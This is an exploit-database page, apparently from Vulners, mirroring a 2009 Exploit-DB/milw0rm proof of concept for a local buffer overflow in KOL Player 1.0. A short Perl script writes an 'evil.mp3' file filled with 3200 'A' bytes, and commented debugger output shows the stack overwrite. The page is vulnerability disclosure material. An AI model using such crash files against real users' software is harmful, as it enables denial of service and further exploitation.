Lucene search
K

KOL Player 1.0 - '.mp3' Local Buffer Overflow (PoC)

🗓️ 18 Aug 2009 00:00:00Reported by Evil.ManType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

KOL Player 1.0 '.mp3' Local Buffer Overflow (PoC) perl scrip

Code
#!/usr/bin/perl
# KOL Player 1.0 (.mp3) Local Buffer Overflow PoC
# http://thaddy.co.uk/kolacmwaveplayer.zip
########################################################################################
# 0012F920  |00168370  ASCII "AAAA"
# 0012F924  |41410004
# 0012F928  |41414141
# 0012F92C  |41414141
# 0012F930  |41414141
# 0012F934  |41414141
# 0012F938  |41414141
# 0012F93C  |41414141
# 0012F940  |41414141
# 0012F944  |41414141
# 0012F948  |41414141
########################################################################################
my $crash="http://"."\x41" x 3200;
open(myfile,'>>evil.mp3');
print myfile $crash;
######################################################################################## 

# milw0rm.com [2009-08-18]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Aug 2009 00:00Current
7High risk
Vulners AI Score7
30